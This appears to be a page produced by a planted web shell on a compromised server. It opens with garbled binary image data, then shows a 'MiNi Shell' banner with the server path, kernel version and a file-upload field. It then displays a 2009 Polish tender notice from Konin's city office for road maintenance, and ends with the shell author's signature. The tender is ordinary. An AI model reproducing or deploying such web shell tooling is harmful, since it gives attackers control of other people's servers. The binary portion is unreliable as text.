JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090402/88280-N-2009.html

<p class="kh_header"><b>Konin: Utrzymanie bieżące i remonty dróg gminnych oraz dróg w miastach na prawach powiatu na terenie Konina lewobrzeżnego i Konina prawobrzeżnego</b><br>
<b>Numer ogłoszenia: 88280 - 2009; data zamieszczenia: 02.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski  w Koninie , Plac Wolności 1, 62-500 Konin, woj. wielkopolskie, tel. (063) 24-01-111, 63 2401139, faks (063) 2401135.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie bieżące i remonty dróg gminnych oraz dróg w miastach na prawach powiatu na terenie Konina lewobrzeżnego i Konina prawobrzeżnego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> wykonanie nawierzchni bitumicznej, remonty nawierzchni bitumicznej, naprawa dróg gruntowych, wykonanie i remonty nawierzchni chodników, oznakowanie pionowe, oznakowanie poziome, odśnieżanie i usuwanie śliskości jezdni.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-9, 45.23.31.42-6, 45.23.32.90-8, 45.23.32.21-4, 90.21.20.00-6, 90.21.30.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 140 000,00 zł w tym na:
- część I: 70 000,00 zł
- część II: 70 000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki zawarte w art. 22 ust. 1 ustawy:

 1. posiadają uprawnienia do wykonywania czynności objętej przedmiotem zamówienia.

2. dysponują (dla każdej części) osobami zdolnymi do wykonania przedmiotu zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, tj. :

a) co najmniej jedną osobą z uprawnieniami budowlanymi do kierowania robotami      budowlanymi w specjalności drogowej,
Kierownik  winien być wpisany na listę członków właściwej izby samorządu zawodowego. 

b) 2 brygadami do robót drogowych w zakresie nawierzchni asfaltowych (min. 6 osób każda)
c) 2 brygadami do robót chodnikowych (min. 6 osób każda)
d) zespołem do utrzymania zimowego dróg (min. 5 osób)

W przypadku złożenia ofert na część I i II zamawiający nie dopuszcza wskazania tych samych osób do realizacji zamówienia.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą łącznie spełniać w/w warunek
 
3. dysponują dla każdej z części potencjałem technicznym lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  wg zestawienia zawartego w tabeli  nr 1 i 2:

Tabela nr 1



L.p.	    
                             Wyszczególnienie	
Parametry techniczne	
Ilość szt.
  /min/
			
1.	Koparka	0,40 m3	1 szt
2.  	Koparko-ładowarka (z wykluczeniem typu Ostrówek i Białoruś) 	
-	
1 szt
3.
	Spycharka	100 kM	1 szt
4	Równiarka samojezdna
	100 kM	1szt
5	Walec statyczny samojezdny	10Mg	1 szt
6	Walec statyczny ogumiony	10Mg	1 szt
7	Walec wibracyjny samojezdny	9 Mg	1 szt
8	Wibrator powierzchniowy	-	1 szt
9	Frezarka drogowa z podajnikiem urobku 	0,5 m	1 szt
10	Ciągnik kołowy	75 kM	1 szt
11	Samochód towarowo-osobowy	0,9 Mg	1 szt
12	Samochód wywrotka	5-10 Mg	1 szt
13	Pługopiaskarki	-	3 szt
14	Pług wraz z ciągnikiem kołowym	-	1 szt

15	Urządzenia do zabezpieczenia ruchu na czas wykonywania robót 
w pasie drogowym 	-	kpl
16	Wytwórnia mas bitumicznych	50 Mg/h	1 szt
17	Rozściełacz mas bitumicznych	szer. 3,5 m	1 szt
 
1.	Pozycje 16 i 17 z tabeli nr 1 wykonawca może mieć wspólne  w przypadku złożenia oferty na część I i II

Tabela nr 2



L.p.	    
                             Opis (rodzaj, nazwa producenta, model)	
     Ilość szt.
        /min/
		
1.	Malowarka automatyczna wyposażona w pistolety natryskowe do farby i mikrokulek	2 szt
2.  	Sprzęt umożliwiający mechaniczne starcie oznakowania istniejącego	
1 szt
3.
	Mechaniczny sprzęt do czyszczenia powierzchni malowanej z pyłu, kurzu, piasku, olejów i innych zanieczyszczeń	1 szt
4	Sprzęt do transportu materiałów przeznaczonych do poziomego znakowania dróg 
	1szt

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą łącznie spełniać w/w warunek


4. posiadają niezbędne doświadczenie tj. - w okresie ostatnich pięciu  lat przed dniem wszczęcia postępowania o udzielenie  zamówienia, a jeżeli okres prowadzenia
działalności jest krótszy - w tym okresie, zrealizowali min dwie prace swoim rodzajem i wartością odpowiadające robotom stanowiącym przedmiot niniejszego zamówienia, tj. związane z remontami nawierzchni, oznakowaniem poziomym i pionowym dróg oraz utrzymaniem zimowym dróg w tym:
Dla części I - wymagane jest wykazanie się utrzymaniem zimowym min. 50km dróg.
Dla części II - wymagane jest wykazanie się utrzymaniem zimowym min. 65 km dróg

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą łącznie spełniać w/w warunek

5. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj.:
   -  dysponują środkami finansowymi lub zdolnością kredytową w wysokości nie mniejszej niż  500 000,00 PLN (dla każdej z części) 

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą łącznie spełniać w/w warunek

6. nie podlegają wykluczeniu z postępowania na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych.
                   

Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych poniżej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Aktualny  odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji       działalności gospodarczej, wystawione nie wcześniej niż 6 m-cy przed upływem       terminu składania ofert. 
Dokument ten muszą złożyć wszyscy wykonawcy wspólnie ubiegający się o przyznanie zamówienia.

2. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą          uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich          kwalifikacji zawodowych, doświadczenia niezbędnych do wykonania zamówienia,                         a  także zakresu wykonywanych przez nie czynności 
Należy przedłożyć:
- kserokopię wymaganych uprawnień niezbędnych do realizacji przedmiotu           zamówienia wraz z aktualnymi  zaświadczeniami stwierdzającymi wpis na listę           członków właściwej izby samorządu zawodowego,
- pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do           wykonania  zamówienia, jeżeli w wykazie, o którym mowa wyżej ,  wykonawca         wskazał osoby, którymi będzie dysponował 

3. Wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje lub będzie dysponował wykonawca 
Należy przedłożyć:
- pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do             wykonania  zamówienia narzędzi i urządzeń, jeżeli w wykazie, o którym mowa wyżej,  wykonawca  wskazał  narzędzia i urządzenia, którymi będzie dysponował 

4. Wykaz zrealizowanych w okresie ostatnich pięciu lat przed dniem  wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie robót wyrażających się wykonaniem min. dwóch prac swoim rodzajem i wartością odpowiadających robotom stanowiącym przedmiot niniejszego zamówienia, tj. związane z remontami nawierzchni, oznakowaniem poziomym i pionowym dróg oraz utrzymaniem zimowym dróg wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie 
 
5. Dokumenty na okoliczność potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:

-	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy nie mniejszą niż  500 000,00 PLN, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,

6.Oświadczenie wykonawcy, że spełnia wymagania art. 22 ust.1 pkt 1-3 ustawy - Prawo zamówień publicznych   

Dokument ten muszą złożyć wszyscy wykonawcy wspólnie ubiegający się o przyznanie zamówienia.

7.  Oświadczenie wykonawcy, że nie podlega wykluczeniu z  postępowania o zamówienie  publiczne na podstawie art. 24 ust.1 i 2 ustawy 

W przypadku składania oferty wspólnej oświadczenie składa pełnomocnik konsorcjum w imieniu wszystkich jego członków.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.konin.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (cena 103,50 zł) można także odebrać w wersji papierowej w siedzibie zamawiającego Konin, pl. Wolności 1, pok. nr 303 lub za zaliczeniem pocztowym do dnia 24.04.2009 r..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2009 godzina 09:45, miejsce: Urząd Miejski w Koninie, Plac Wolności 1, 62-500 Konin, pok. nr 303.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie bieżące i remonty dróg gminnych oraz dróg w miastach na prawach powiatu na terenie Konina - lewobrzeżnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie nawierzchni bitumicznej, remonty nawierzchni bitumicznej, naprawa dróg gruntowych, wykonanie i remonty nawierzchni chodników, oznakowanie pionowe, oznakowanie poziome, odśnieżanie i usuwanie śliskości jezdni.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-9, 45.23.31.42-6, 45.23.32.90-8, 45.23.32.21-4, 90.21.20.00-6, 90.21.30.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie bieżące i remonty dróg gminnych oraz dróg w miastach na prawach powiatu na terenie Konina - prawobrzeżnego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie nawierzchni bitumicznej, remonty nawierzchni bitumicznej, naprawa dróg gruntowych, wykonanie i remonty nawierzchni chodników, oznakowanie pionowe, oznakowanie poziome, odśnieżanie i usuwanie śliskości jezdni.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-9, 45.23.31.42-6, 45.23.32.90-8, 45.23.32.21-4, 90.21.20.00-6, 90.21.30.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com